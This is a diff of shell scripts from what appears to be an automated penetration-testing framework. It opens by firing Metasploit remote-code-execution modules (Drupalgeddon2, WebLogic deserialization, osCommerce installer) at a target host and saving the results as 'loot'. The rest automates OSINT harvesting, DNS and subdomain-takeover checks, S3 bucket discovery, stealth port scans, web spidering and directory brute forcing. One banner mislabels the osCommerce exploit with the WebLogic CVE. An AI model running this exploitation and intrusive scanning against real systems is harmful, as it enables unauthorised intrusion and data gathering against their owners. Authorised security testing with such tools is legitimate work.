msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
fi
fi

View File

@ -1,7 +1,26 @@
if [ "$OSINT" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$WHOIS" == "1" ]; then
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null $RESET"
fi
whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING OSINT INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python2.7 $THEHARVESTER -d $TARGET -l 100 -b all 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null
metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null
fi
if [ "$THEHARVESTER" == "1" ]; then
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python2.7 $THEHARVESTER_PATH -d $TARGET -l 100 -b all 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null $RESET"
fi
theharvester -d $TARGET -l 25 -b all 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null
fi
if [ "$METAGOOFIL" == "1" ]; then
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null $RESET"
fi
metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null
fi
fi

24
modes/osint_stage_2.sh Normal file
View File

@ -0,0 +1,24 @@
if [ $SCAN_TYPE == "DOMAIN" ] && [ $OSINT == "1" ]; then
if [ $OSINT == "0" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SKIPPING OSINT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
else
if [ $GOOHAK = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING GOOGLE HACKING QUERIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
goohak $TARGET > /dev/null
fi
if [ $INURLBR = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING INURLBR OSINT QUERIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET | tee $LOOT_DIR/osint/inurlbr-$TARGET
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/osint/inurlbr-$TARGET > $LOOT_DIR/osint/inurlbr-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/osint/inurlbr-$TARGET
rm -Rf output/ cookie.txt exploits.conf
fi
GHDB="1"
fi
fi

View File

@ -1,8 +1,4 @@
if [ "$RECON" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
whois $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -27,7 +23,7 @@ if [ "$RECON" = "1" ]; then
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$DNSCAN" = "1" ]; then
python $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_DEFAULT -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
python $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_QUICK -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt 2>/dev/null | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
fi
@ -52,44 +48,29 @@ if [ "$RECON" = "1" ]; then
sort -u /tmp/curl.out 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-full.txt
rm -f /tmp/curl.out 2> /dev/null
echo -e "$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR EMAIL SECURITY $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/spoofcheck/spoofcheck.py $TARGET | tee $LOOT_DIR/nmap/email-$TARGET.txt 2>/dev/null
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED STARTING DOMAIN FLYOVER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
aquatone-discover -d $TARGET -t 100 | tee $LOOT_DIR/nmap/aquatone-$TARGET-discover 2>/dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-discover > $LOOT_DIR/nmap/aquatone-$TARGET-discover.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-discover 2> /dev/null
aquatone-takeover -d $TARGET -t 100 | tee $LOOT_DIR/nmap/aquatone-$TARGET-takeovers 2>/dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-takeovers > $LOOT_DIR/nmap/aquatone-$TARGET-takeovers.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-takeovers 2> /dev/null
aquatone-scan -d $TARGET -t 100 -p80,443 | tee $LOOT_DIR/nmap/aquatone-$TARGET-ports 2>/dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-ports > $LOOT_DIR/nmap/aquatone-$TARGET-ports.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-ports 2> /dev/null
aquatone-gather -d $TARGET -t 100 | tee $LOOT_DIR/nmap/aquatone-$TARGET-gather.txt 2>/dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-gather > $LOOT_DIR/nmap/aquatone-$TARGET-gather.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-gather 2> /dev/null
mkdir -p $LOOT_DIR/aquatone/ 2> /dev/null
cp -Rf ~/aquatone/$TARGET $LOOT_DIR/aquatone/
echo ""
if [ "$SPOOF_CHECK" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR EMAIL SECURITY $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/spoofcheck/spoofcheck.py $TARGET | tee $LOOT_DIR/nmap/email-$TARGET.txt 2>/dev/null
echo ""
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR SUBDOMAIN HIJACKING $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
dig $TARGET CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
if [ "$SUBOVER" = "1" ]; then
cd $PLUGINS_DIR/SubOver/
python subover.py -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/subover-$TARGET 2>/dev/null
subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/subover-$TARGET 2>/dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/subover-$TARGET > $LOOT_DIR/nmap/subover-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/takeovers-$TARGET-subover 2> /dev/null
cd $INSTALL_DIR
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED STARTING PUBLIC S3 BUCKET SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd $PLUGINS_DIR/slurp/
./slurp-linux-amd64 domain --domain $TARGET | tee $LOOT_DIR/nmap/takeovers-$TARGET-s3-buckets.txt 2>/dev/null
if [ "$SLURP" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED STARTING PUBLIC S3 BUCKET SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd $PLUGINS_DIR/slurp/
./slurp-linux-amd64 domain --domain $TARGET | tee $LOOT_DIR/nmap/takeovers-$TARGET-s3-buckets.txt 2>/dev/null
fi
fi

View File

@ -11,9 +11,6 @@ if [ "$MODE" = "stealth" ]; then
if [ "$FULLNMAPSCAN" = "1" ]; then
args="$args -fp"
fi
if [ "$GOOHAK" = "1" ]; then
args="$args -g"
fi
if [ "$RECON" = "1" ]; then
args="$args -re"
fi
@ -81,9 +78,14 @@ if [ "$MODE" = "stealth" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN dnsenum $TARGET 2> /dev/null | tee $LOOT_DIR/output/dnsenum-$TARGET.txt 2> /dev/null$RESET"
fi
dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
dnsenum $TARGET 2> /dev/null
dnsenum $TARGET 2> /dev/null | tee $LOOT_DIR/output/dnsenum-$TARGET.txt 2> /dev/null
mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
if [ $SCAN_TYPE == "DOMAIN" ];
@ -91,6 +93,9 @@ if [ "$MODE" = "stealth" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR SUBDOMAIN HIJACKING $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i \"wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp\" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null$RESET"
fi
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
source modes/osint.sh
@ -103,6 +108,9 @@ if [ "$MODE" = "stealth" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt$RESET"
fi
nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
@ -113,55 +121,102 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-http > $LOOT_DIR/web/waf-$TARGET-http.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
whatweb -a 3 http://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http > $LOOT_DIR/web/whatweb-$TARGET-http.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/wig/wig.py -d -q -t 50 http://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-http
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http > $LOOT_DIR/web/wig-$TARGET-http.txt 2> /dev/null
if [ "$WAFWOOF" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http 2> /dev/null$RESET"
fi
wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-http.raw > $LOOT_DIR/web/waf-$TARGET-http.txt 2> /dev/null
rm -f tee $LOOT_DIR/web/waf-$TARGET-http.raw 2> /dev/null
fi
if [ "$WHATWEB" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whatweb -a 3 http://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http 2> /dev/null$RESET"
fi
whatweb -a 3 http://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http.raw > $LOOT_DIR/web/whatweb-$TARGET-http.txt 2> /dev/null
rm -f $LOOT_DIR/web/whatweb-$TARGET-http.raw 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 3 --max-time 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
if [ "$PASSIVE_SPIDER" = "1" ]; then
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null$RESET"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl --connect-timeout=5 --max-time 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null$RESET"
fi
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 5 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 -s -R -L http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-http-$TARGET.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET.txt 2> /dev/null
if [ "$PASSIVE_SPIDER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null$RESET"
fi
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
fi
if [ "$WAYBACKMACHINE" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null$RESET"
fi
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u http://$TARGET -l 1
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u http://$TARGET:80 -l 3 $RESET"
fi
blackwidow -u http://$TARGET:80 -l 3 -v n
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
if [ "$WEB_BRUTE_STEALTHSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
fi
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FAST -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=10000 2> /dev/null
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=10000 2> /dev/null
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null$RESET"
fi
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
fi
fi
@ -170,30 +225,56 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-https > $LOOT_DIR/web/waf-$TARGET-https.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
whatweb -a 3 https://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-https 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-https > $LOOT_DIR/web/whatweb-$TARGET-https.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/wig/wig.py -d -q -t 50 https://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-https
